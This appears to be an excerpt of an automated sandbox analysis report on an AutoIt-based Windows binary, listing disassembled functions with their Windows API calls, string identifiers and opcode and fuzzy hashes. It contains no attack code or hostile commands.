                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 464785882-4108050209
                                                            • Opcode ID: 27181d7801832a6ae2a8a250de64cf9c38e8ba09a8d8d56d6cda0302e4a754ca
                                                            • Instruction ID: a8e5352732addb88c5363b2e59b48eb67e09a0f6666890a4a564862a71973478
                                                            • Opcode Fuzzy Hash: 27181d7801832a6ae2a8a250de64cf9c38e8ba09a8d8d56d6cda0302e4a754ca
                                                            • Instruction Fuzzy Hash: CA12AC34600202EFDB25CF28C988BA9BBE5BF45310F54497AF895DB662C731EC52DB90
                                                            Function 002177BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 002177F1
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002178B0
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002178EE
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00217900
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00217946
                                                            • GetClientRect.USER32(00000000,?), ref: 00217952
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00217996
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002179A5
                                                            • GetStockObject.GDI32(00000011), ref: 002179B5
                                                            • SelectObject.GDI32(00000000,00000000), ref: 002179B9
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002179C9
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002179D2
                                                            • DeleteDC.GDI32(00000000), ref: 002179DB
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00217A07
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00217A1E
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00217A59
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00217A6D
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00217A7E
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00217AAE
                                                            • GetStockObject.GDI32(00000011), ref: 00217AB9
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00217AC4
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00217ACE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: b7426d0bebac03f85a974a07a307afba979404c7b45a0cc194ed6e03fd89f173
                                                            • Instruction ID: 97e2e156a067de1a6414c6c4eedbf83263dae7aee4b51cfcc8f5e44b4a9cbcf3
                                                            • Opcode Fuzzy Hash: b7426d0bebac03f85a974a07a307afba979404c7b45a0cc194ed6e03fd89f173
                                                            • Instruction Fuzzy Hash: F6A17171A40215BFEB149FA4ED4EFAE7BB9EB45710F008224FA14A71E0C7B0AD51CB60
                                                            Function 0020AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020AF89
                                                            • GetDriveTypeW.KERNEL32(?,0022FAC0,?,\\.\,0022F910), ref: 0020B066
                                                            • SetErrorMode.KERNEL32(00000000,0022FAC0,?,\\.\,0022F910), ref: 0020B1C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 5430cee75d57348ee0aa00b9273b6b5d6f0e1551ba053b651904f0673479f06f
                                                            • Instruction ID: 1be0ea6aa20df9df77d3ea7afaa0ed95e500400154b48aa8335917c0b1b4341d
                                                            • Opcode Fuzzy Hash: 5430cee75d57348ee0aa00b9273b6b5d6f0e1551ba053b651904f0673479f06f
                                                            • Instruction Fuzzy Hash: 4551BF346B4306ABCB21DF10CAA387DF3B1AB1B342B204115E80EA72D2D7B59D75CB56
                                                            Function 001A6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: c5db61bab22f3db7de2952c4292753a230595dc24007dd56a6875925994596a8
                                                            • Instruction ID: 1c3f022d643d19e5ba581edb05a35342e19ebef0bf55c086f9d7578801d7b795
                                                            • Opcode Fuzzy Hash: c5db61bab22f3db7de2952c4292753a230595dc24007dd56a6875925994596a8
                                                            • Instruction Fuzzy Hash: E981FC74740215BBCB25BB60CD83FAE77A9AF37701F084025FD45AB1C2EB60DA55C6A1
                                                            Function 0022AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0022AB99
                                                            • SetTextColor.GDI32(?,?), ref: 0022AB9D
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0022ABB3
                                                            • GetSysColor.USER32(0000000F), ref: 0022ABBE
                                                            • CreateSolidBrush.GDI32(?), ref: 0022ABC3
                                                            • GetSysColor.USER32(00000011), ref: 0022ABDB
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0022ABE9
                                                            • SelectObject.GDI32(?,00000000), ref: 0022ABFA
                                                            • SetBkColor.GDI32(?,00000000), ref: 0022AC03
                                                            • SelectObject.GDI32(?,?), ref: 0022AC10
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0022AC2F
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0022AC46
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0022AC5B
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0022ACA7
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0022ACCE
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0022ACEC
                                                            • DrawFocusRect.USER32(?,?), ref: 0022ACF7
                                                            • GetSysColor.USER32(00000011), ref: 0022AD05
                                                            • SetTextColor.GDI32(?,00000000), ref: 0022AD0D
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0022AD21
                                                            • SelectObject.GDI32(?,0022A869), ref: 0022AD38
                                                            • DeleteObject.GDI32(?), ref: 0022AD43
                                                            • SelectObject.GDI32(?,?), ref: 0022AD49
                                                            • DeleteObject.GDI32(?), ref: 0022AD4E
                                                            • SetTextColor.GDI32(?,?), ref: 0022AD54
                                                            • SetBkColor.GDI32(?,?), ref: 0022AD5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 3dbc25597677e4b398a9ea0434a3113f67d5ff25d4b9649764f20dfdb8db297e
                                                            • Instruction ID: 08c23f1f19636d32d050e3d35387c8c118bac947d5fc85f442fbd37ba92810b0
                                                            • Opcode Fuzzy Hash: 3dbc25597677e4b398a9ea0434a3113f67d5ff25d4b9649764f20dfdb8db297e
                                                            • Instruction Fuzzy Hash: E5617C71900219FFDB219FE8ED48EAEBB79FB08320F104126F915AB2A1D6759951CF90
                                                            Function 00228C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00228D34
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00228D45
                                                            • CharNextW.USER32(0000014E), ref: 00228D74
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00228DB5
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00228DCB
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00228DDC
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00228DF9
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00228E45
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00228E5B
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00228E8C
                                                            • _memset.LIBCMT ref: 00228EB1
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00228EFA
                                                            • _memset.LIBCMT ref: 00228F59
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00228F83
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00228FDB
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00229088
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002290AA
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002290F4
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00229121
                                                            • DrawMenuBar.USER32(?), ref: 00229130
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00229158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 69684d19559957b0a5e66408d74a5a71a676656bbea567ee24ed96f86211f11a
                                                            • Instruction ID: 06d6000ac46b12d5ca413d2b9b87aba3cc73d59cbc2b42e2ad1eb5cb06730f78
                                                            • Opcode Fuzzy Hash: 69684d19559957b0a5e66408d74a5a71a676656bbea567ee24ed96f86211f11a
                                                            • Instruction Fuzzy Hash: FCE1C670911229BBDF209FA1EC88EEE7B79EF15710F008159F91996190DB70C9A5DF60
                                                            Function 00224B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00224C51
                                                            • GetDesktopWindow.USER32 ref: 00224C66
                                                            • GetWindowRect.USER32(00000000), ref: 00224C6D
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00224CCF
                                                            • DestroyWindow.USER32(?), ref: 00224CFB
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00224D24
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00224D42
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00224D68
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00224D7D
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00224D90
                                                            • IsWindowVisible.USER32(?), ref: 00224DB0
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00224DCB
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00224DDF
                                                            • GetWindowRect.USER32(?,?), ref: 00224DF7
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00224E1D
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00224E37
                                                            • CopyRect.USER32(?,?), ref: 00224E4E
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00224EB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: eab52ad66473c2f8282f96d2f09810c5497faa1a0b09c8c08fe572be7cb9f6ae
                                                            • Instruction ID: 26f6679d7da64ea5c182226715f60972ea29ced4648b0efbd78f5a17d5b13967
                                                            • Opcode Fuzzy Hash: eab52ad66473c2f8282f96d2f09810c5497faa1a0b09c8c08fe572be7cb9f6ae
                                                            • Instruction Fuzzy Hash: B3B1DD70614311AFDB54EFA4D948B6ABBE4FF88310F00892DF5999B2A1CB70EC55CB91
                                                            Function 001A27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001A28BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 001A28C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001A28EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 001A28F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 001A291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001A2939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001A2949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001A297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001A2990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 001A29AE
                                                            • GetStockObject.GDI32(00000011), ref: 001A29CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 001A29D5
                                                              • Part of subcall function 001A2344: GetCursorPos.USER32(?), ref: 001A2357
                                                              • Part of subcall function 001A2344: ScreenToClient.USER32(002667B0,?), ref: 001A2374
                                                              • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000001), ref: 001A2399
                                                              • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000002), ref: 001A23A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,001A1256), ref: 001A29FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: f6988cb411856e5bc9126d24f1c5b34fc4a2f836cae3ad8de90d38d81fabc154
                                                            • Instruction ID: 5103b9a6c5d2e8eb35ffe4f06fabe8d6f797d0341d932bb67c8b9503aef648a0
                                                            • Opcode Fuzzy Hash: f6988cb411856e5bc9126d24f1c5b34fc4a2f836cae3ad8de90d38d81fabc154
                                                            • Instruction Fuzzy Hash: BDB17F75A0020AEFDB24DFA8DD49BAE7BB4FB09714F108529FA15E7290CB74D851CB90
                                                            Function 00224069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 002240F6
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002241B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 3974292440-719923060
                                                            • Opcode ID: 1d7bd0497dcc434181ef233e786626f852bda0b1515aafd0b1dea2bb81d84228
                                                            • Instruction ID: 32bce4dc5d11b8ccacb9e57644f627267f071803d758a8e900bb45afb138c314
                                                            • Opcode Fuzzy Hash: 1d7bd0497dcc434181ef233e786626f852bda0b1515aafd0b1dea2bb81d84228
                                                            • Instruction Fuzzy Hash: EAA1C134224316EBCB14FFA0D841A7AB3A5BFA5314F10496CB8969B2D2DB30ED59CB41
                                                            Function 002152F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00215309
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00215314
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0021531F
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 0021532A
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00215335
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00215340
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0021534B
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00215356
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00215361
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0021536C
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00215377
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00215382
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0021538D
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00215398
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 002153A3
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 002153AE
                                                            • GetCursorInfo.USER32(?), ref: 002153BE
                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 002153E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: be99bd6de18c17ef431873840756fc3fc984cf618dbd2c33b88a077fcd306f76
                                                            • Instruction ID: f74bc639952509430e3bdc3ba8d036e43635640209b7125bf0b8241d7d4ee571
                                                            • Opcode Fuzzy Hash: be99bd6de18c17ef431873840756fc3fc984cf618dbd2c33b88a077fcd306f76
                                                            • Instruction Fuzzy Hash: A6417470E04329AADB109FB69C498AEFFF8EF91B10B10452FE519E7290DAB89441CE51
                                                            Function 001FAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 001FAAA5
                                                            • __swprintf.LIBCMT ref: 001FAB46
                                                            • _wcscmp.LIBCMT ref: 001FAB59
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001FABAE
                                                            • _wcscmp.LIBCMT ref: 001FABEA
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 001FAC21
                                                            • GetDlgCtrlID.USER32(?), ref: 001FAC73
                                                            • GetWindowRect.USER32(?,?), ref: 001FACA9
                                                            • GetParent.USER32(?), ref: 001FACC7
                                                            • ScreenToClient.USER32(00000000), ref: 001FACCE
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 001FAD48
                                                            • _wcscmp.LIBCMT ref: 001FAD5C
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 001FAD82
                                                            • _wcscmp.LIBCMT ref: 001FAD96
                                                              • Part of subcall function 001C386C: _iswctype.LIBCMT ref: 001C3874
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 424922a39e94b32e5e86514ac8be5de81f088fa2925df0a679e16c6fbf1deba1
                                                            • Instruction ID: fd85827e439119b3fa94d588cbb88dd06ba80c5559897d7447f441f161d9acb0
                                                            • Opcode Fuzzy Hash: 424922a39e94b32e5e86514ac8be5de81f088fa2925df0a679e16c6fbf1deba1
                                                            • Instruction Fuzzy Hash: 96A1BFB120470AABD714DFA0C884FBAB7A8FF14315F408629FAAD92191D734E955CB92
                                                            Function 001FB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 001FB3DB
                                                            • _wcscmp.LIBCMT ref: 001FB3EC
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 001FB414
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 001FB431
                                                            • _wcscmp.LIBCMT ref: 001FB44F
                                                            • _wcsstr.LIBCMT ref: 001FB460
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 001FB498
                                                            • _wcscmp.LIBCMT ref: 001FB4A8
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 001FB4CF
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 001FB518
                                                            • _wcscmp.LIBCMT ref: 001FB528
